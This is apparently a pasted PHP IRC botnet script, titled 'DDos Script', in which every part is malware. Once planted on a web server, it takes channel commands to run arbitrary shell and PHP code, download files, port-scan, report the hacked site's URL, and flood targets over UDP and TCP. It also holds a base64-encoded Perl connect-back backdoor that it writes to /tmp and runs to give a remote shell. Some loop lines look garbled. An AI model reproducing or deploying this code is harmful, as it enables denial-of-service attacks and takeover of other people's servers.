DDos Script [PHP]

1. //login to the bot
2. * .logout //logout of the bot
3. * .die //kill the bot
4. * .restart //restart the bot
5. * .mail //send an email
6. * .dns //dns lookup
7. * .download //download a file
8. * .exec // uses exec() //execute a command
9. * .sexec // uses shell_exec() //execute a command
10. * .cmd // uses popen() //execute a command
11. * .info //get system information
12. * .php // uses eval() //execute php code
13. * .tcpflood //tcpflood attack
14. * .udpflood //udpflood attack
15. * .raw //raw IRC command
16. * .rndnick //change nickname
17. * .pscan //port scan
18. * .safe // test safe_mode (dvl)
19. * .inbox // test inbox (dvl)
20. * .sambung // conect back (dvl)
21. * .uname // return shell's uname using a php function (dvl)
22. *
23. */
24.  
25. set_time_limit(0);
26. error_reporting(0);
27. echo "ok!";
28.  
29. class pBot
30. {
31. var $config = array("server"=>"SERVER", // ip/host da rede
32. "port"=>"6667", // porta da rede
33. "pass"=>"PASSWORDNYA", // senha da rede
34. "prefix"=>"NAMA BOT", // nick do bot
35. "maxrand"=>"2", // quantidade de numero no nick do bot
36. "chan"=>"CHANNEL", // canal que os bots vao entrar
37. "chan2"=>"CHANNEL", // canal aonde os bots v?o mandar as vulns ao conectar (-n)
38. "key"=>"senhadocanal", // senha do canal
39. "modes"=>"+p", // modos do bot
40. "password"=>"PASSWORD", // senha pra acesso (.user SENHA)
41. "trigger"=>".", // prefico dos comandos
42. "hostauth"=>"*" // host dos owners (* for any hostname)
43. );
44. var $users = array();
45. function start()
46. {
47. if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
48. $this->start();
49. $ident = $this->config['prefix'];
50. $alph = range("0","9");
51. for($i=0;$i<$this->config['maxrand'];$i++)
52. $ident .= $alph[rand(0,9)];
53. if(strlen($this->config['pass'])>0)
54. $this->send("PASS ".$this->config['pass']);
55. $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
56. $this->set_nick();
57. $this->main();
58. }
59. function main()
60. {
61. while(!feof($this->conn))
62. {
63. $this->buf = trim(fgets($this->conn,512));
64. $cmd = explode(" ",$this->buf);
65. if(substr($this->buf,0,6)=="PING :")
66. {
67. $this->send("PONG :".substr($this->buf,6));
68. }
69. if(isset($cmd[1]) && $cmd[1] =="001")
70. {
71. $this->send("MODE ".$this->nick." ".$this->config['modes']);
72. $this->join($this->config['chan'],$this->config['key']);
73. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; }
74. else { $safemode = "OFF"; }
75. $uname = php_uname();
76. $this->privmsg($this->config['chan2'],"uname: $uname (Safe: $safemode)");
77. $this->privmsg($this->config['chan2'],"Vuln : http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
78. }
79. if(isset($cmd[1]) && $cmd[1]=="433")
80. {
81. $this->set_nick();
82. }
83. if($this->buf != $old_buf)
84. {
85. $mcmd = array();
86. $msg = substr(strstr($this->buf," :"),2);
87. $msgcmd = explode(" ",$msg);
88. $nick = explode("!",$cmd[0]);
89. $vhost = explode("@",$nick[1]);
90. $vhost = $vhost[1];
91. $nick = substr($nick[0],1);
92. $host = $cmd[0];
93. if($msgcmd[0]==$this->nick)
94. {
95. for($i=0;$i2)
96. {
97. switch($cmd[1])
98. {
99. case "QUIT":
100. if($this->is_logged_in($host))
101. {
102. $this->log_out($host);
103. }
104. break;
105. case "PART":
106. if($this->is_logged_in($host))
107. {
108. $this->log_out($host);
109. }
110. break;
111. case "PRIVMSG":
112. if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
113. {
114. if(substr($mcmd[0],0,1)==".")
115. {
116. switch(substr($mcmd[0],1))
117. {
118. case "user":
119. if($mcmd[1]==$this->config['password'])
120. {
121. $this->log_in($host);
122. }
123. else
124. {
125. $this->notice($this->config['chan'],"[\2Auth\2]: Wawwwwwwwww $nick Bocah Goblok!!");
126. }
127. break;
128. }
129. }
130. }
131. elseif($this->is_logged_in($host))
132. {
133. if(substr($mcmd[0],0,1)==".")
134. {
135. switch(substr($mcmd[0],1))
136. {
137. case "restart":
138. $this->send("QUIT :restart commando from $nick");
139. fclose($this->conn);
140. $this->start();
141. break;
142. case "mail": //mail to from subject message
143. if(count($mcmd)>4)
144. {
145. $header = "From: <".$mcmd[2].">";
146. if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
147. {
148. $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
149. }
150. else
151. {
152. $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
153. }
154. }
155. break;
156. case "safe":
157. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
158. {
159. $safemode = "on";
160. }
161. else {
162. $safemode = "off";
163. }
164. $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
165. break;
166. case "inbox": //teste inbox
167. if(isset($mcmd[1]))
168. {
169. $token = md5(uniqid(rand(), true));
170. $header = "From: ";
171. $a = php_uname();
172. $b = getenv("SERVER_SOFTWARE");
173. $c = gethostbyname($_SERVER["HTTP_HOST"]);
174. if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl ",$header))
175. {
176. $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
177. }
178. else
179. {
180. $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
181. }
182. }
183. break;
184. case "sambung":
185. if(count($mcmd)>2)
186. {
187. $this->sambung($mcmd[1],$mcmd[2]);
188. }
189. break;
190. case "dns":
191. if(isset($mcmd[1]))
192. {
193. $ip = explode(".",$mcmd[1]);
194. if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
195. {
196. $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
197. }
198. else
199. {
200. $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
201. }
202. }
203. break;
204. case "info":
205. case "vunl":
206. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
207. else { $safemode = "off"; }
208. $uname = php_uname();
209. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
210. $this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
211. break;
212. case "bot":
213. $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp.");
214. break;
215. case "uname":
216. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
217. else { $safemode = "off"; }
218. $uname = php_uname();
219. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
220. break;
221. case "rndnick":
222. $this->set_nick();
223. break;
224. case "raw":
225. $this->send(strstr($msg,$mcmd[1]));
226. break;
227. case "eval":
228. $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
229. break;
230. case "sexec":
231. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
232. $exec = shell_exec($command);
233. $ret = explode("\n",$exec);
234. for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i]));
235. break;
236.  
237. case "exec":
238. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
239. $exec = exec($command);
240. $ret = explode("\n",$exec);
241. for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i]));
242. break;
243.  
244. case "passthru":
245. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
246. $exec = passthru($command);
247. $ret = explode("\n",$exec);
248. for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i]));
249. break;
250.  
251. case "popen":
252. if(isset($mcmd[1]))
253. {
254. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
255. $this->privmsg($this->config['chan'],"[\2popen\2]: $command");
256. $pipe = popen($command,"r");
257. while(!feof($pipe))
258. {
259. $pbuf = trim(fgets($pipe,512));
260. if($pbuf != NULL)
261. $this->privmsg($this->config['chan']," : $pbuf");
262. }
263. pclose($pipe);
264. }
265.  
266. case "system":
267. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
268. $exec = system($command);
269. $ret = explode("\n",$exec);
270. for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i]));
271. break;
272.  
273.  
274. case "pscan": // .pscan 127.0.0.1 6667
275. if(count($mcmd) > 2)
276. {
277. if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
278. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
279. else
280. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
281. }
282. break;
283. case "ud.server": // .ud.server [password]
284. if(count($mcmd)>2)
285. {
286. $this->config['server'] = $mcmd[1];
287. $this->config['port'] = $mcmd[2];
288. if(isset($mcmcd[3]))
289. {
290. $this->config['pass'] = $mcmd[3];
291. $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
292. }
293. else
294. {
295. $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
296. }
297. }
298. break;
299. case "download":
300. if(count($mcmd) > 2)
301. {
302. if(!$fp = fopen($mcmd[2],"w"))
303. {
304. $this->privmsg($this->config['chan'],"[\2download\2]: Proses Mendownload File. Gagal coy permissionnya dilarang.");
305. }
306. else
307. {
308. if(!$get = file($mcmd[1]))
309. {
310. $this->privmsg($this->config['chan'],"[\2download\2]: Proses Mendownload File \2".$mcmd[1]."\2");
311. }
312. else
313. {
314. for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
315. }
316. fclose($fp);
317. }
318. }
319. else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
320. break;
321. case "die":
322. $this->send("QUIT :die command from $nick");
323. fclose($this->conn);
324. exit;
325. case "logout":
326. $this->log_out($host);
327. $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
328. break;
329. case "udpflood":
330. if(count($mcmd)>3)
331. {
332. $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
333. }
334. break;
335. case "tcpflood":
336. if(count($mcmd)>5)
337. {
338. $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
339. }
340. break;
341. }
342. }
343. }
344. break;
345. }
346. }
347. }
348. $old_buf = $this->buf;
349. }
350. $this->start();
351. }
352. function send($msg)
353. {
354. fwrite($this->conn,"$msg\r\n");
355.  
356. }
357. function join($chan,$key=NULL)
358. {
359. $this->send("JOIN $chan $key");
360. }
361. function privmsg($to,$msg)
362. {
363. $this->send("PRIVMSG $to :$msg");
364. }
365. function notice($to,$msg)
366. {
367. $this->send("NOTICE $to :$msg");
368. }
369. function is_logged_in($host)
370. {
371. if(isset($this->users[$host]))
372. return 1;
373. else
374. return 0;
375. }
376. function log_in($host)
377. {
378. $this->users[$host] = true;
379. }
380. function log_out($host)
381. {
382. unset($this->users[$host]);
383. }
384. function set_nick()
385. {
386. if(isset($_SERVER['SERVER_SOFTWARE']))
387. {
388. if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
389. $this->nick = "A";
390. elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
391. $this->nick = "I";
392. elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
393. $this->nick = "X";
394. else
395. $this->nick = "U";
396. }
397. else
398. {
399. $this->nick = "C";
400. }
401. $this->nick .= $this->config['prefix'];
402. for($i=0;$i<$this->config['maxrand'];$i++)
403. $this->nick .= mt_rand(0,9);
404. $this->send("NICK ".$this->nick);
405. }
406. function udpflood($host,$packetsize,$time) {
407. $this->privmsg($this->config['chan'],"[\2UdpFlood Dimulai bom!\2]");
408. $packet = "";
409. for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++; } $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg($this->config['chan'],"[\2UdpFlood Selesai!\2]: $env MB DDOS ATTACK / Media: $vel MB/s ");
410. }
411. function tcpflood($host,$packets,$packetsize,$port,$delay)
412. {
413. $this->privmsg($this->config['chan'],"[\2TcpFlood Dimulai Bos!\2]");
414. $packet = "";
415. for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
416. return 0;
417. }
418. else
419. {
420. fwrite($fp,$packet);
421. fclose($fp);
422. }
423. sleep($delay);
424. }
425. $this->privmsg($this->config['chan'],"[\2TcpFlood Selesai!\2]: Config - $packets pacotes para $host:$port.");
426. }
427. function sambung($ip,$port)
428. {
429. $this->privmsg($this->config['chan'],"[\2sambung\2]: tentando conectando a $ip:$port");
430. $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
431. if (is_writable("/tmp"))
432. {
433. if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
434. $fp=fopen("/tmp/dc.pl","w");
435. fwrite($fp,base64_decode($dc_source));
436. passthru("perl /tmp/dc.pl $ip $port &");
437. unlink("/tmp/dc.pl");
438. }
439. else
440. {
441. if (is_writable("/var/tmp"))
442. {
443. if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
444. $fp=fopen("/var/tmp/dc.pl","w");
445. fwrite($fp,base64_decode($dc_source));
446. passthru("perl /var/tmp/dc.pl $ip $port &");
447. unlink("/var/tmp/dc.pl");
448. }
449. if (is_writable("."))
450. {
451. if (file_exists("dc.pl")) { unlink("dc.pl"); }
452. $fp=fopen("dc.pl","w");
453. fwrite($fp,base64_decode($dc_source));
454. passthru("perl dc.pl $ip $port &");
455. unlink("dc.pl");
456. }
457. }
458. }
459. }
460.  
461. $bot = new pBot;
462. $bot->start();
463.  
464. ?>